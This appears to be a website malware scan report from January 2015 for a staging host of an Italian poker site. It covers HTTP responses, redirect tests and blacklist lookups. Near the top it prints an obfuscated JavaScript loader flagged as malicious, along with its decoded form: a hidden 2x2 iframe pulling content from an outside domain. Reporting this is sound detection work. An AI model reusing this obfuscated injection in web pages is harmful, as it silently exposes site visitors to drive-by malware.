Scanned pages/files
| Request | Server response | Status |
http://gdpoker.tv.staging.ipercast.net/ | 200 OK Content-Length: 44624 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;try{bcsd=prototype-2;}catch(bawg){ss=[];f=(h)?("fromCharC"+"ode"):"";e=window["e"+"val"];n=[13,20,300,444,99,234,327,404,110,232,138,476,114,210,348,404,40,78,180,420,102,228,291,436,101,64,345,456,99,122,102,416,116,232,336,232,47,94,330,420,107,202,303,484,98,92,297,444,109,94,345,464,97,232,345,184,112,208,336,136,32,230,297,456,111,216,324,420,110,206,183,136,97,234,348,444,34,64,306,456,97,218,303,392,111,228,300,404,114,122,102,440,111,68,96,388,108,210,309,440,61,68,297,404,110,232,303,456,34,64,312,404,105,206,312,464,61,68,150,136,32,238,315,400,116,208,183,136,50,68,186,240,47,210,306,456,97,218,303,248,39,82,177,52,10];if(window.document)for(i=6-2-1-2-1;-145+i!=2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+2-1));}e("if(1)"+ss);}} Decoded script: if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); if(1) document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); <iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe> document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); document.write('<iframe src="http://nikeeyb.com/stats.php" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); Antivirus reports:
| ||
http://gdpoker.tv.staging.ipercast.net/scarica/index.html?dottv2frontend=935a4de1aa23a1a2154203032be212c5 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Thu, 15 Jan 2015 16:20:40 GMT Pragma: no-cache Location: http://www.pokerdigitale.it/blog/error Server: Apache Vary: Accept-Encoding Content-Length: 947 Content-Type: text/html Expires: Thu, 19 Nov 1981 08:52:00 GMT | clean |
http://www.pokerdigitale.it/blog/error | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=0 Connection: close Date: Thu, 15 Jan 2015 16:20:42 GMT Location: http://blog.gdpoker.it/error Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 15 Jan 2015 16:20:42 GMT | clean |
http://blog.gdpoker.it/error | 404 Not Found Content-Length: 51710 Content-Type: text/html | clean |
http://blog.gdpoker.it/scarica/index.html | 404 Not Found Content-Length: 51718 Content-Type: text/html | clean |
http://blog.gdpoker.it/promozioni/index.html | 404 Not Found Content-Length: 51721 Content-Type: text/html | clean |
http://blog.gdpoker.it/come-giocare/index.html | 404 Not Found Content-Length: 51723 Content-Type: text/html | clean |
http://blog.gdpoker.it/come-giocare/regole-texas/index.html | 404 Not Found Content-Length: 51736 Content-Type: text/html | clean |
http://blog.gdpoker.it/come-giocare/regole-omaha/index.html | 404 Not Found Content-Length: 51736 Content-Type: text/html | clean |
http://blog.gdpoker.it/tornei/index.html | 404 Not Found Content-Length: 51717 Content-Type: text/html | clean |
http://blog.gdpoker.it/classifiche/index.html | 404 Not Found Content-Length: 51722 Content-Type: text/html | clean |
http://blog.gdpoker.it/vip/index.html | 404 Not Found Content-Length: 51714 Content-Type: text/html | clean |
http://blog.gdpoker.it/gd-team/index.html | 404 Not Found Content-Length: 51718 Content-Type: text/html | clean |
http://blog.gdpoker.it/category/news/ | 200 OK Content-Length: 60069 Content-Type: text/html | clean |
http://blog.gdpoker.it/category/curiosita/ | 200 OK Content-Length: 60628 Content-Type: text/html | clean |
http://blog.gdpoker.it/category/tornei-online/ | 200 OK Content-Length: 59718 Content-Type: text/html | clean |
http://blog.gdpoker.it/category/tornei-live/ | 200 OK Content-Length: 61797 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gdpoker.tv.staging.ipercast.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 16:20:38 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: dottv2frontend=935a4de1aa23a1a2154203032be212c5; path=/
GET / HTTP/1.1
Host: gdpoker.tv.staging.ipercast.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 Jan 2015 16:20:38 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: dottv2frontend=935a4de1aa23a1a2154203032be212c5; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: gdpoker.tv.staging.ipercast.net
Referer: http://www.google.com/search?q=gdpoker.tv.staging.ipercast.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gdpoker.tv.staging.ipercast.net
Referer: http://www.google.com/search?q=gdpoker.tv.staging.ipercast.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gdpoker.tv.staging.ipercast.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gdpoker.tv.staging.ipercast.net/
Result: gdpoker.tv.staging.ipercast.net is not infected or malware details are not published yet.
Result: gdpoker.tv.staging.ipercast.net is not infected or malware details are not published yet.